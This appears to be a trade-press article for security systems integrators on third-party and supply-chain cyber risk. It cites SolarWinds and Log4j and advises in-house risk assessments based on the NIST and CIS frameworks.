Cyber risk, which once was a threat landscape characteristically targeting large enterprise companies, has permeated new points on the supply chain. Now third-party vendors and service providers are increasingly at risk.
Cyber vulnerabilities are in IT, physical security, operational technology, controls, automation and the internet of things. Organizations with 50 or fewer employees are especially at risk because they may not have dedicated cybersecurity teams and may be unaware of attacks. Smaller firms may not be able to recover from a ransomware attack and may actually suffer the largest losses relative to the business’ size, according to the Hiscox Cyber Readiness Report.
Phishing, email compromise, ransomware, insecure remote access/stolen credentials and direct network infiltrations are the most prevalent threats. In some ransomware examples, malicious actors can move laterally across the network by gaining access to one person’s email and using it as a trusted means to deliver a phishing attempt to access other systems.
Sophisticated cybercriminals may leverage SMS text messages (“smishing”), voice phishing by phone (“vishing”) and even social media channels to reach employees.
For systems integrators, there’s a lot at stake. Physical security is a sensitive business you have privileged access to. You often maintain and record security diagrams and layouts that show device locations, passwords, customer IT system schedules and IP MAC addresses. You move between different customer locations, plugging into the IT infrastructure for installation and troubleshooting. That process is risky, and laptops often contain private customer information that could be vulnerable.
Expanding threat vectors
This trend of shifting risk began with the SolarWinds breach in late 2020. The Austin, Texas-based firm develops software for companies to manage their networks, systems and IT infrastructure. In this digital supply chain attack, hackers inserted malicious code into trusted third-party software, potentially infecting all of the hacked company’s customers. Attackers compromised an estimated 18,000 organizations globally, including Microsoft and government agencies.
Third-party and technology supply-chain risk was a recurring theme in 2021. In late December, a significant new threat called Log4j emerged. According to the Cybersecurity and Infrastructure Security Agency, “Log4j is very broadly used in a variety of consumer and enterprise services, websites and applications—as well as in operational technology products—to log security and performance information. An unauthenticated remote actor could exploit this vulnerability to take control of an affected system.”
Cyberattacks are no longer isolated incidents affecting a single organization because there’s a clear ripple effect from one vendor to another. If one of your contractors or suppliers is hacked or is part of a ransomware attack, anyone who does business with them, either by procuring product or providing physical security services, may be at risk.
Cybersecurity rings in 2022
Cybersecurity is a top concern in the new year, according to the Silver Spring, Md.-based Security Industry Association’s 2022 Security Megatrends Report.
“The attack vector may not always be an access control server or a security camera; it could be your own corporate servers or a piece of network infrastructure you added to build a client’s security network,” according to the report.
As a direct result, projects may now include new requirements, such as a cybersecurity risk assessment that outlines the protection and processes in place. Enterprise organizations that are vetting systems integrators for projects realize that their vendors may be a gateway or weak link and require additional analysis. These companies may also want you to conduct risk assessments on the vendors with which you do business.
What you need to do
Every company needs cybersecurity processes, provided by either an in-house team or an outsourced cybersecurity contractor. Without it, you may lose projects to those companies with a stronger cyber posture that can prove their stature.
Start with an in-house risk assessment to determine your current status. The widely accepted frameworks from the National Institute of Standards and Technology and Center for Internet Security, East Greenbush, N.Y., serve as guides to meeting basic controls.
For systems integrators, it’s not if you need cybersecurity, it’s how quickly you can put a program in place. Many organizations vetting contractors are using special teams to assess current and existing vendors on whether their services require a deeper cybersecurity review. Will you be ready?